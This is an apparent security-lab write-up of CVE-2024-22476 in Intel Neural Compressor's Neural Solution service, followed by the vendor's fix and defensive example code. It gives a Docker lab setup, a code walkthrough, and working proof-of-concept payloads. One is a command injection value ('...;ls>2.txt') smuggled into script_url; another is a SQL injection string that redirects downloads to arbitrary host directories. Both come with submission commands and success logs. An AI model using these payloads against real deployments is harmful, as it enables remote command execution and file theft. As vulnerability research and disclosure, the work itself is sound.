Intel® Neural Compressor CVE-2024-22476 Vulnerability Analysis


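On May 16, the vulnerability early-warning feed of the security lab's security research team flagged a remote command injection vulnerability in Intel's Neural Compressor. It currently carries a score of 10 and is tracked as CVE-2024-22476. Neural Compressor is mainly used for deep learning deployment on CPUs or GPUs and supports popular model compression techniques, such as quantization, pruning (sparsity), distillation, and neural architecture search, on all mainstream deep learning frameworks (TensorFlow, PyTorch, ONNX Runtime, and MXNet). It helps reduce model size, lower compute and storage requirements, and speed up inference. The vulnerable component is neural-solution (Neural Solution), which lets users submit optimization tasks through a RESTful/gRPC API. Neural Solution automatically dispatches these tasks to one or more nodes, which simplifies the whole process.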

Preparation

Install Docker, start an Ubuntu 22.04 container, list the running containers, and attach to the container:

docker run --name zs_ubuntu22.04 -it ubuntu:22.04
docker ps
docker attach container_id
apt-get install wget

Install Anaconda on Ubuntu 22.04 (press Enter and answer yes at every prompt), then create and activate an environment:

apt update
apt install curl -y
curl --output conda.sh https://repo.anaconda.com/archive/Anaconda3-2024.02-1-Linux-x86_64.sh
bash conda.sh
source ~/.bashrc
conda create --name code python=3.10
conda activate code

The project provides a pip installation method and requires a Python version newer than 3.8. Install it directly with pip:

pip install neural-solution

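However, the official pip repository still serves the vulnerable version, so for real use, download the code from the official GitHub repository whenever possible.

Tip: if you run into problems installing mpi4py, the following command resolves them: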

apt-get install mpich

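Vulnerability Reproduction

Vulnerable Code Analysis

Working backwards from the fix patch, the vulnerability comes from insufficient filtering of the input in the task parameter. Judging from the test cases, the impact depends on the data type of each input field and on how each field is processed. For example, in the model download step that uses wget, task.script_url is supposed to be a download URL; because it is not checked, commands appended after the URL can lead to command injection. The cause and mechanics of the vulnerability are analyzed below.

The task parameter

A task is an abstraction of a user's tuning request and is handled by the Neural Solution service.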

class Task:
    ...

    def __init__(
        self,
        task_id,
        arguments,
        workers,
        status,
        script_url,
        optimized,
        approach,
        requirement,
        result="",
        q_model_path="",
    ):
        """Init task.

        Args:
            task_id (str): the id of task.
            arguments (str): the running arguments for task.
            workers (int): the resources.
            status (str): "pending", "running", "done", "failed"
            script_url (str): the python script address
            optimized (bool): the running script has been optimized
            approach (str): the quantization method
            requirement (str): python packages
            result (str, optional): the result of task. Defaults to "".
            q_model_path (str, optional): the quantized model path. Defaults to "".
        """
        ...

TaskDB manages all tasks: it stores them in a database and manages the task queue and the task details.

class TaskDB:
    ...

    def __init__(self, db_path):
        self.task_queue = deque()
        create_dir(db_path)
        # sqlite should set this check_same_thread to False
        self.conn = sqlite3.connect(f"{db_path}", check_same_thread=False)
        self.cursor = self.conn.cursor()
        self.cursor.execute(
            "create table if not exists task(id TEXT PRIMARY KEY, arguments varchar(100), "
            + "workers int, status varchar(20), script_url varchar(500), optimized integer, "
            + "approach varchar(20), requirements varchar(500), result varchar(500), q_model_path varchar(200))"
        )
        self.conn.commit()
        # self.task_collections = []
        self.lock = threading.Lock()

SQL/command injection at the frontend entry point

Taking task submission through the RESTful API as an example, users call the service through /task/submit/.

@app.post("/task/submit/")
async def submit_task(task: Task):
    ...
    msg = "Task submitted successfully"
    status = "successfully"
    # search the current
    db_path = get_db_path(config.workspace)

    if os.path.isfile(db_path):
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        task_id = str(uuid.uuid4()).replace("-", "")
        sql = (
            r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"
            + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(
                task_id,
                task.script_url,
                task.optimized,
                list_to_string(task.arguments),
                task.approach,
                list_to_string(task.requirements),
                task.workers,
            )
        )
        cursor.execute(sql)
        conn.commit()
    ...

The SQL statement is built with string formatting:

sql = (
    r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"
    + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(
        task_id,
        task.script_url,
        task.optimized,
        list_to_string(task.arguments),
        task.approach,
        list_to_string(task.requirements),
        task.workers,
    )
)
cursor.execute(sql)

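Here the SQL statement is assembled from request fields and executed directly without any checks, so a malicious attacker can perform SQL injection. The attacker can update the q_model_path field (or any other field) of any task in the TaskDB.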
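The difference between formatted and parameterized statements can be sketched with an in-memory SQLite database. This is a minimal illustration, not the project's code: the table is a simplified stand-in for the real task table, and make_db, insert_unsafe, insert_safe, count_rows, and PAYLOAD are hypothetical names introduced here.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a simplified, illustrative task table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table task(id TEXT PRIMARY KEY, script_url TEXT, approach TEXT, status TEXT)"
    )
    return conn


def insert_unsafe(conn, task_id, script_url, approach):
    """Build the statement with str.format, the same pattern as the vulnerable handler."""
    sql = (
        "insert into task(id, script_url, approach, status)"
        + " values ('{}', '{}', '{}', 'pending')".format(task_id, script_url, approach)
    )
    conn.execute(sql)


def insert_safe(conn, task_id, script_url, approach):
    """Bind values through placeholders so they are always treated as data."""
    conn.execute(
        "insert into task(id, script_url, approach, status) values (?, ?, ?, 'pending')",
        (task_id, script_url, approach),
    )


def count_rows(conn) -> int:
    """Return the number of rows in the task table."""
    return conn.execute("select count(*) from task").fetchone()[0]


# A crafted approach value that closes the first row, appends a second row,
# and comments out the rest of the original statement.
PAYLOAD = "static', 'pending'), ('injected', 'x', 'y', 'done') --"

if __name__ == "__main__":
    unsafe_db, safe_db = make_db(), make_db()
    insert_unsafe(unsafe_db, "t1", "https://example.com/run.py", PAYLOAD)
    insert_safe(safe_db, "t1", "https://example.com/run.py", PAYLOAD)
    print("rows after formatted insert:", count_rows(unsafe_db))
    print("rows after parameterized insert:", count_rows(safe_db))
```

With the formatted statement the payload becomes part of the SQL text and adds an attacker-controlled row; with placeholders the same string is stored verbatim in the approach column.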

Arbitrary file download

@app.get("/download/{task_id}")
async def download_file(task_id: str):
    db_path = get_db_path(config.workspace)
    if os.path.isfile(db_path):
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        cursor.execute(r"select status, result, q_model_path from task where id=?", (task_id,))
        res = cursor.fetchone()
        cursor.close()
        conn.close()
    ...
    path = res[2]
    zip_filename = "quantized_model.zip"
    zip_filepath = os.path.abspath(os.path.join(get_task_workspace(config.workspace), task_id, zip_filename))
    # create zipfile and add file
    with zipfile.ZipFile(zip_filepath, "w", zipfile.ZIP_DEFLATED) as zip_file:
        for root, dirs, files in os.walk(path):
            for file in files:
                file_path = os.path.join(root, file)
                zip_file.write(file_path, os.path.basename(file_path))

    return FileResponse(
        zip_filepath,
        media_type="application/octet-stream",
        filename=zip_filename,
        background=BackgroundTask(os.remove, zip_filepath),
    )

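In addition, the /download/ API zips and returns whatever folder the q_model_path field points to, and this field is neither filtered nor validated. If an attacker updates a task's q_model_path field in the database, they can easily download any directory on the host system that the service can read.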
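One way to reason about this is a containment check that refuses to serve a path outside the service workspace. The sketch below is an illustration under assumptions, not the project's fix: is_within_workspace and the example paths are hypothetical.

```python
from pathlib import Path


def is_within_workspace(candidate: str, workspace: str) -> bool:
    """Return True only if candidate resolves to the workspace or a path below it.

    Both paths are resolved first, so ".." segments and symlinks cannot be
    used to step outside the workspace.
    """
    base = Path(workspace).resolve()
    target = Path(candidate).resolve()
    return target == base or base in target.parents


if __name__ == "__main__":
    workspace = "/tmp/ns_workspace"  # hypothetical workspace location
    for path in (
        "/tmp/ns_workspace/task_workspace/abc/model",
        "/home/victim",
        "/tmp/ns_workspace/../etc",
    ):
        print(path, is_within_workspace(path, workspace))
```

A download handler could run such a check on the value read from the database before walking the directory, so that a tampered q_model_path is rejected instead of zipped.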

Command injection

Again taking task submission through the RESTful API as an example, users call the service through /task/submit/.

@app.post("/task/submit/")
async def submit_task(task: Task):
    if not is_valid_task(task.dict()):
        raise HTTPException(status_code=422, detail="Invalid task")
    ...
    if os.path.isfile(db_path):
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        task_id = str(uuid.uuid4()).replace("-", "")
        sql = (
            r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"
            + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(
                task_id,
                task.script_url,
                task.optimized,
                list_to_string(task.arguments),
                task.approach,
                list_to_string(task.requirements),
                task.workers,
            )
        )

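Here the SQL statement is assembled from request fields and executed directly without any checks, so a malicious attacker can perform SQL injection. The attacker can update the script_url field (or any other field) of any task in the TaskDB.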

def prepare_task(self, task: Task):
    ...
    if is_remote_url(task.script_url):
        task_url = task.script_url.replace("github.com", "raw.githubusercontent.com").replace("blob", "")
        try:
            subprocess.check_call(["wget", "-P", self.task_path, task_url])
        except subprocess.CalledProcessError as e:
            logger.info("Failed: {}".format(e.cmd))
    ...
    if not task.optimized:
        # Generate quantization code with Neural Coder API
        neural_coder_cmd = ["python -m neural_coder --enable --approach"]
        # for users to define approach: "static", "static_ipex", "dynamic", "auto"
        approach = task.approach
        neural_coder_cmd.append(approach)
        if is_remote_url(task.script_url):
            self.script_name = task.script_url.split("/")[-1]
        neural_coder_cmd.append(self.script_name)
        neural_coder_cmd = " ".join(neural_coder_cmd)
        full_cmd = """cd {}\n{}""".format(self.task_path, neural_coder_cmd)
        p = subprocess.Popen(full_cmd, shell=True)  # nosec
        ...

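The script_url parameter in the body of the POST request is not validated or filtered on the backend, so an attacker can manipulate it to execute arbitrary commands remotely. The value first reaches subprocess.check_call(["wget", "-P", self.task_path, task_url]). In the code shown, that call passes task_url as a single list argument without a shell, so shell metacharacters are not interpreted at that point. They take effect in the later subprocess.Popen(full_cmd, shell=True) call, where the script name taken from script_url (everything after the last "/") is joined into the command string.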
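The way the last path segment of script_url ends up inside a shell command string in the prepare_task code above can be sketched without executing anything. This is an illustration only: build_shell_command and build_argv are hypothetical helpers, and the argument-list form is one common alternative, not the fix Intel shipped.

```python
import shlex


def build_shell_command(script_url: str, approach: str) -> str:
    """Mimic the string joining done in prepare_task (nothing is executed here)."""
    script_name = script_url.split("/")[-1]
    return " ".join(["python -m neural_coder --enable --approach", approach, script_name])


def build_argv(script_url: str, approach: str) -> list:
    """Build an argument list suitable for subprocess without shell=True."""
    script_name = script_url.split("/")[-1]
    return ["python", "-m", "neural_coder", "--enable", "--approach", approach, script_name]


if __name__ == "__main__":
    url = "https://www.baidu.com;ls>2.txt"  # script_url from the PoC
    # As one string handed to a shell, ";" ends the first command and "ls>2.txt" runs next.
    print(build_shell_command(url, "static"))
    # As a list, the whole segment stays one literal argument.
    print(build_argv(url, "static"))
    # If a shell string is unavoidable, shlex.quote keeps the segment a single word.
    print(shlex.quote(url.split("/")[-1]))
```

Passing the list form to subprocess without shell=True means the script name is never parsed by a shell, which removes this particular injection path regardless of which characters the URL contains.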

POC

Start the service on the local machine:

# Start neural solution service with custom configuration
(code) root@c0c72ded848f:/home# neural_solution start --task_monitor_port=22222 --result_monitor_port=33333 --restful_api_port=8000
2024-05-23 07:45:22 [INFO] No environment specified, use environment activated: (code) as the task runtime environment.
2024-05-23 07:45:24 [INFO] Neural Solution Service Started!
2024-05-23 07:45:24 [INFO] Service log saving path is in "/home/ns_workspace/serve_log"
2024-05-23 07:45:24 [INFO] To submit task at: 172.17.0.3:8000/task/submit/
2024-05-23 07:45:24 [INFO] [For information] neural_solution -h

Command injection

Create the PoC file test.json:

{
  "script_url": "https://www.baidu.com;ls>2.txt",
  "optimized": "False",
  "arguments": [
    "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
  ],
  "approach": "static",
  "requirements": [],
  "workers": 1
}

Submit the task to trigger the command injection vulnerability:

(code) root@c0c72ded848f:/home# python -m neural_solution.frontend.gRPC.client submit --request="test.json"
2024-05-23 07:47:27 [INFO] Try to start gRPC server.
2024-05-23 07:47:27 [INFO] Parsed task:
2024-05-23 07:47:27 [INFO] {
2024-05-23 07:47:27 [INFO]     'script_url': 'https://www.baidu.com;ls>2.txt',
2024-05-23 07:47:27 [INFO]     'optimized': 'False',
2024-05-23 07:47:27 [INFO]     'arguments': [
2024-05-23 07:47:27 [INFO]         '--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result'
2024-05-23 07:47:27 [INFO]     ],
2024-05-23 07:47:27 [INFO]     'approach': 'static',
2024-05-23 07:47:27 [INFO]     'requirements': [
2024-05-23 07:47:27 [INFO]     ],
2024-05-23 07:47:27 [INFO]     'workers': 1
2024-05-23 07:47:27 [INFO] }
2024-05-23 07:47:27 [INFO] Healthy
2024-05-23 07:47:27 [INFO] Neural Solution is running.
2024-05-23 07:47:27 [INFO] successfully
2024-05-23 07:47:27 [INFO] 93d5ca44800647f7a939d2652a6eb1e4
2024-05-23 07:47:27 [INFO] Task submitted successfully

The vulnerability is triggered on the server, and the file 2.txt is generated.

SQL injection

Create the PoC file test.json:

{
  "script_url": "https://www.baidu.com",
  "optimized": "False",
  "arguments": [],
  "approach": "5', '6', 7, 'pending'), ('7f8364d1b9884e5aa409b148a67fb666', '2', 3, '4', '5', '6', 7, 'done') ON CONFLICT (id) DO UPDATE SET id = '7f8364d1b9884e5aa409b148a67fb666', status = 'done', q_model_path = '/home/victim' --",
  "requirements": [],
  "workers": 1
}
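To see why this approach value works, it helps to render the statement the handler would build from it. The sketch below only formats a string and executes nothing. The list_to_string function here is an assumed stand-in for the project's helper (its real implementation is not shown in this article), and the task_id value and the render_insert name are hypothetical.

```python
def list_to_string(items):
    """Assumed stand-in for the project's helper: join list items with spaces."""
    return " ".join(str(item) for item in items)


def render_insert(task_id: str, task: dict) -> str:
    """Format the insert statement the same way the vulnerable handler does."""
    return (
        r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"
        + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(
            task_id,
            task["script_url"],
            task["optimized"],
            list_to_string(task["arguments"]),
            task["approach"],
            list_to_string(task["requirements"]),
            task["workers"],
        )
    )


# The PoC request body from test.json.
POC_TASK = {
    "script_url": "https://www.baidu.com",
    "optimized": "False",
    "arguments": [],
    "approach": (
        "5', '6', 7, 'pending'), ('7f8364d1b9884e5aa409b148a67fb666', '2', 3, '4', '5', '6', 7, 'done') "
        "ON CONFLICT (id) DO UPDATE SET id = '7f8364d1b9884e5aa409b148a67fb666', "
        "status = 'done', q_model_path = '/home/victim' --"
    ),
    "requirements": [],
    "workers": 1,
}

if __name__ == "__main__":
    print(render_insert("aaaa", POC_TASK))
```

In the rendered statement the payload completes the first row, adds a second row for the targeted task id, attaches an ON CONFLICT clause that rewrites status and q_model_path when that id already exists, and turns the remainder of the original statement into a comment.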

Submit the task to trigger the SQL injection vulnerability:

curl -H "Content-Type: application/json" --data @./test.json http://127.0.0.1:8000/task/submit/
{"status":"successfully","task_id":"f6045c12317e41f8bef6ebddd9911049","msg":"Task submitted successfully"}

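The vulnerability is triggered on the server, and the files can then be downloaded.

Fix

Intel fixed the issue in the Neural Compressor v2.5 release by adding two functions to neural_solution/frontend/utility.py that filter out command injection input.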

def is_invalid_str(to_test_str: str):
    return any(char in to_test_str for char in [" ", '"', "'", "&", "|", ";", "`", ">"])


def is_valid_task(task: dict) -> bool:
    required_fields = ["script_url", "optimized", "arguments", "approach", "requirements", "workers"]

    for field in required_fields:
        if field not in task:
            return False

    if not isinstance(task["script_url"], str) or is_invalid_str(task["script_url"]):
        return False

    if (isinstance(task["optimized"], str) and task["optimized"] not in ["True", "False"]) or (
        not isinstance(task["optimized"], str) and not isinstance(task["optimized"], bool)
    ):
        return False

    if not isinstance(task["arguments"], list):
        return False
    else:
        for argument in task["arguments"]:
            if is_invalid_str(argument):
                return False

    if not isinstance(task["approach"], str) or task["approach"] not in ["static", "static_ipex", "dynamic", "auto"]:
        return False

    if not isinstance(task["requirements"], list):
        return False
    else:
        for requirement in task["requirements"]:
            if is_invalid_str(requirement):
                return False

    if not isinstance(task["workers"], int) or task["workers"] < 1:
        return False

    return True
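As a quick check of the filter against the PoC inputs used earlier, the sketch below copies is_invalid_str from the listing above and applies it, together with the approach allow-list, to the two payloads. ALLOWED_APPROACHES and approach_is_allowed are hypothetical names that mirror the allow-list check inside is_valid_task.

```python
def is_invalid_str(to_test_str: str):
    """Copied from the fix: flag strings containing shell or SQL metacharacters."""
    return any(char in to_test_str for char in [" ", '"', "'", "&", "|", ";", "`", ">"])


# Mirrors the allow-list used for the approach field in is_valid_task.
ALLOWED_APPROACHES = ["static", "static_ipex", "dynamic", "auto"]


def approach_is_allowed(approach) -> bool:
    """Accept only the exact approach names on the allow-list."""
    return isinstance(approach, str) and approach in ALLOWED_APPROACHES


if __name__ == "__main__":
    # script_url from the command injection PoC: contains ";" and ">".
    print(is_invalid_str("https://www.baidu.com;ls>2.txt"))
    # A plain URL passes the character filter.
    print(is_invalid_str("https://www.baidu.com"))
    # The start of the approach value from the SQL injection PoC is not on the allow-list.
    print(approach_is_allowed("5', '6', 7, 'pending'), ("))
    print(approach_is_allowed("static"))
```

Going by the code as shown, the character filter also rejects any list item that contains a space, so an arguments entry that packs several flags into one string would be flagged as invalid too.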